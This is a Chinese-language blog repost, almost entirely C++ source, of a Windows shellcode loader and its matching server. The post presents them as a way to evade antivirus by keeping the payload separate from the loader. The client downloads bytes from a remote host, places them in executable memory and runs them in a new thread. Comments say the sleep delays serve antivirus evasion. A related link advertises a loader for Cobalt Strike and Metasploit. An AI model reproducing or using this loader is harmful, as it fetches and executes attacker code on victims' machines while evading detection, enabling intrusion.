远程加载shellcode实现分离免杀
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了远程加载shellcode实现分离免杀相关的知识,希望对你有一定的参考价值。
客户端:
#include <stdio.h>
#include <iostream>
#include <WinSock2.h>
#pragma comment(lib, "ws2_32.lib") //添加ws2_32动态库
#pragma warning(disable:4996) //忽略旧函数使用的警告
using namespace std;
int main(int argc, char *argv[])
{
const int BUF_SIZE = 1024;
WSADATA wsd; //WSADATA变量
SOCKET sHost; // 服务器套接字socket
SOCKADDR_IN servAddr; //服务器地址
char buf[BUF_SIZE]; // 存放发送的数据缓冲区
char bufRecv[BUF_SIZE]; //接收收到的数据缓冲区
DWORD dwThreadId;
HANDLE hThread;
DWORD dwOldProtect;
int retVal; // 返回值
if (WSAStartup(MAKEWORD(2, 2), &wsd) != 0) //初始化套结字动态库
{
cout << "WSAStartup failed!" << endl;
return -1;
}
sHost = socket(AF_INET, SOCK_STREAM, 0); //创建套接字 IPV4 可靠的,双向的类型服务提供商选择
if (INVALID_SOCKET == sHost)
{
cout << "socket failed!" << endl;
WSACleanup();
return -1;
}
//设置服务器的地址
servAddr.sin_family = AF_INET; //指定IPV4
servAddr.sin_addr.s_addr = inet_addr(argv[1]); // 指定服务器的地址
servAddr.sin_port = htons((short)atoi(argv[2])); // 指定服务器的端口
retVal = connect(sHost, (LPSOCKADDR)&servAddr, sizeof(servAddr)); // 套接字 sockaddr的指针,也就是地址 第三个参数为SOCKADDR_IN结构体的大小
if (SOCKET_ERROR == retVal) //判断是否连接成功
{
cout << "connect failed!" << endl;
closesocket(sHost);
WSACleanup();
return -1;
}
ZeroMemory(buf, BUF_SIZE); // buf指向的地址用0来填充
strcpy(buf, "ok"); //给ok两个字节的字符串复制给buf
retVal = send(sHost, buf, strlen(buf), 0); //send的返回值
if (SOCKET_ERROR == retVal) //判断是否发送成功
{
cout << "send failed!" << endl;
closesocket(sHost);
WSACleanup();
return -1;
}
cout << "Starting Download Payload" << endl;
ZeroMemory(bufRecv, BUF_SIZE); // bufRevc指向的地址用0来填充
Sleep(2000); //延迟两秒起到免杀绕过的效果
cout << "Downloading." << endl;
//RecvLine(sHost, bufRecv);
recv(sHost, bufRecv, BUF_SIZE, 0); //bufRecv缓冲区接收 服务端发送来的数据
cout << "OK." << endl;
cout << "接收到的数据:" << bufRecv << endl;
Sleep(4000);
closesocket(sHost);
WSACleanup();
cout << "Start load" << endl;
//下面就是开辟内存存储shellcode 创建线程进行执行
char * shellcode = (char *)VirtualAlloc(
NULL,
BUF_SIZE,
MEM_COMMIT,
PAGE_EXECUTE_READWRITE
);
CopyMemory(shellcode, bufRecv, BUF_SIZE);
hThread = CreateThread(
NULL,
NULL,
(LPTHREAD_START_ROUTINE)shellcode,
NULL,
NULL,
&dwThreadId
);
WaitForSingleObject(hThread, INFINITE);
return 0;
}
服务端:
#include "winsock2.h"
#pragma comment(lib, "ws2_32.lib")
#include <iostream>
using namespace std;
int main(int argc, char* argv[])
{
const int BUF_SIZE = 1024;
WSADATA wsd; //WSADATA变量
SOCKET sServer; //服务器套接字
SOCKET sClient; //客户端套接字
SOCKADDR_IN addrServ;; //服务器地址
char buf[BUF_SIZE]; //接收数据缓冲区
//char sendBuf[BUF_SIZE];//返回给客户端的数据
char sendBuf[] = "this is shellcode";
int retVal; //返回值
//初始化套结字动态库
if (WSAStartup(MAKEWORD(2, 2), &wsd) != 0)
{
cout << "WSAStartup failed!" << endl;
return 1;
}
//创建套接字
sServer = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (INVALID_SOCKET == sServer)
{
cout << "socket failed!" << endl;
WSACleanup();//释放套接字资源;
return -1;
}
//服务器套接字地址
addrServ.sin_family = AF_INET;
addrServ.sin_port = htons((short)atoi(argv[1]));;
addrServ.sin_addr.s_addr = INADDR_ANY;
//绑定套接字
retVal = bind(sServer, (LPSOCKADDR)&addrServ, sizeof(SOCKADDR_IN));
if (SOCKET_ERROR == retVal)
{
cout << "bind failed!" << endl;
closesocket(sServer); //关闭套接字
WSACleanup(); //释放套接字资源;
return -1;
}
//开始监听
retVal = listen(sServer, 1);
if (SOCKET_ERROR == retVal)
{
cout << "listen failed!" << endl;
closesocket(sServer); //关闭套接字
WSACleanup(); //释放套接字资源;
return -1;
}
//接受客户端请求
sockaddr_in addrClient;
int addrClientlen = sizeof(addrClient);
sClient = accept(sServer, (sockaddr FAR*)&addrClient, &addrClientlen);
if (INVALID_SOCKET == sClient)
{
cout << "accept failed!" << endl;
closesocket(sServer); //关闭套接字
WSACleanup(); //释放套接字资源;
return -1;
}
int flag = 1;
while (flag)
{
//接收客户端数据
ZeroMemory(buf, BUF_SIZE); // 填充为0 防止意外
retVal = recv(sClient, buf, BUF_SIZE, 0); // 接收数据放在buf缓冲区
if (SOCKET_ERROR == retVal)//判断
{
cout << "recv failed!" << endl;
closesocket(sServer); //关闭套接字
closesocket(sClient); //关闭套接字
WSACleanup(); //释放套接字资源;
return -1;
}
if (buf[0] == '0')
break;
cout << "客户端发送的数据: " << buf << endl;
cout << "向客户端发送shellcode: " << sendBuf << endl;
send(sClient, sendBuf, strlen(sendBuf), 0);
cout << "发送成功!" << endl;
flag = 0;
}
//退出
closesocket(sServer); //关闭套接字
closesocket(sClient); //关闭套接字
WSACleanup(); //释放套接字资源;
return 0;
}
参考文章:https://payloads.online/archivers/2019-11-10/2
以上是关于远程加载shellcode实现分离免杀的主要内容,如果未能解决你的问题,请参考以下文章
[源码]Python免杀ShellCode加载器(Cobaltstrike/Metasploit)